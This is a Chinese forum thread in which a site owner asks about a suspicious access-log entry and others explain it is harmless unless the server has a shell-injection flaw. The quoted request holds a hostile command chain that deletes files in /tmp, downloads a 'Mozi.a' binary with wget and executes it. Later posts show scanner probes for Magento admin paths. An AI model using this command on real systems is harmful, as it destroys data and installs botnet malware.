设为首页收藏本站

简体中文 繁體中文 English 日本語 Deutsch 한국 사람 بالعربية TÜRKÇE português คนไทย Français

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 85|回复: 9

网站收到这样的请求有什么风险?

[复制链接]

50

主题

940

回帖

2088

积分

金牌会员

积分
2088
发表于 2019-12-19 12:25:15 | 显示全部楼层 |阅读模式
网站访问日志有一条这样的内容,请教大佬,有什么实际的风险吗?

GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
回复

使用道具 举报

192

主题

30

回帖

704

积分

高级会员

积分
704
发表于 2019-12-19 12:34:43 | 显示全部楼层
没风险,这个地址你打开估计就是个404页面 。
回复

使用道具 举报

50

主题

940

回帖

2088

积分

金牌会员

积分
2088
 楼主| 发表于 2019-12-19 12:42:14 | 显示全部楼层

ckqf 发表于 2019-12-19 12:34

没风险,这个地址你打开估计就是个404页面 。

好的,
还有个疑问,通过这种方式真的能执行shell命令?
回复

使用道具 举报

192

主题

30

回帖

704

积分

高级会员

积分
704
发表于 2019-12-19 12:34:00 | 显示全部楼层

ibmall 发表于 2019-12-19 12:42

好的,
还有个疑问,通过这种方式真的能执行shell命令?

有shell注入漏洞的才会有风险。
回复

使用道具 举报

133

主题

1677

回帖

3873

积分

论坛元老

积分
3873
发表于 2019-12-19 12:44:45 | 显示全部楼层
dj有这种网页的在线维护模式吗,flask是能把这个功能关了
回复

使用道具 举报

50

主题

940

回帖

2088

积分

金牌会员

积分
2088
 楼主| 发表于 2019-12-19 12:42:00 | 显示全部楼层

ckqf 发表于 2019-12-19 12:44

有shell注入漏洞的才会有风险。

好的,多谢  大佬                 。
回复

使用道具 举报

50

主题

940

回帖

2088

积分

金牌会员

积分
2088
 楼主| 发表于 2019-12-19 12:48:37 | 显示全部楼层

pulpfunction 发表于 2019-12-19 12:48

dj有这种网页的在线维护模式吗,flask是能把这个功能关了

这个我还不知道,我去查查

把你的友链放上了,暂时就那个位置,还没考虑好以后怎么布局合适。
回复

使用道具 举报

133

主题

1677

回帖

3873

积分

论坛元老

积分
3873
发表于 2019-12-19 12:51:13 | 显示全部楼层

ibmall 发表于 2019-12-19 13:53

这个我还不知道,我去查查

把你的友链放上了,暂时就那个位置,还没考虑好以后怎么布局合适。 ...

不急啊大哥 我那都没有流量 哈哈 ,flask是运行错误能输密码进入Python shell .. 这个请求是不是直接找shell.php .html什么的执行命令 也没见过这种网页输命令行的程序
回复

使用道具 举报

50

主题

940

回帖

2088

积分

金牌会员

积分
2088
 楼主| 发表于 2019-12-19 12:44:00 | 显示全部楼层

pulpfunction 发表于 2019-12-19 12:57

不急啊大哥 我那都没有流量 哈哈 ,flask是运行错误能输密码进入Python shell .. 这个请求是不是直接找sh ...

嗯,流量慢慢就有了。

每天都有不少 找 xxx.php 的请求,这个倒是不担心,网站一个php文件都没有

[17/Dec/2019:17:09:00] "GET /admin/" 302 -
[17/Dec/2019:17:09:00] "GET /" 200 14176
[17/Dec/2019:17:09:02] "GET /shop/admin/" 200 5648
[17/Dec/2019:17:09:03] "GET /store/admin/" 200 5648
[17/Dec/2019:17:09:04] "GET /magento/admin/" 200 5648
[17/Dec/2019:17:09:06] "GET /magento2/admin/" 200 5648
[17/Dec/2019:17:09:07] "GET /pub/errors/503.php" 200 5648
[17/Dec/2019:17:09:08] "GET /shop/pub/errors/503.php" 200 5648
[17/Dec/2019:17:09:09] "GET /store/pub/errors/503.php" 200 5648
[17/Dec/2019:17:09:10] "GET /magento/pub/errors/503.php" 200 5648
[17/Dec/2019:17:09:11] "GET /magento2/pub/errors/503.php" 200 5648
回复

使用道具 举报

50

主题

940

回帖

2088

积分

金牌会员

积分
2088
 楼主| 发表于 2019-12-19 12:53:27 | 显示全部楼层
被扫了不用管


ibmall 发表于 2019-12-19 14:26

嗯,流量慢慢就有了。

每天都有不少 找 xxx.php 的请求,这个倒是不担心,网站一个php文件都没有

要不就到get方式的接口,我回去也把wp登录改了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|Discuz! X

GMT+8, 2026-3-31 06:53 , Processed in 0.016969 second(s), 4 queries , Gzip On, Redis On.

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表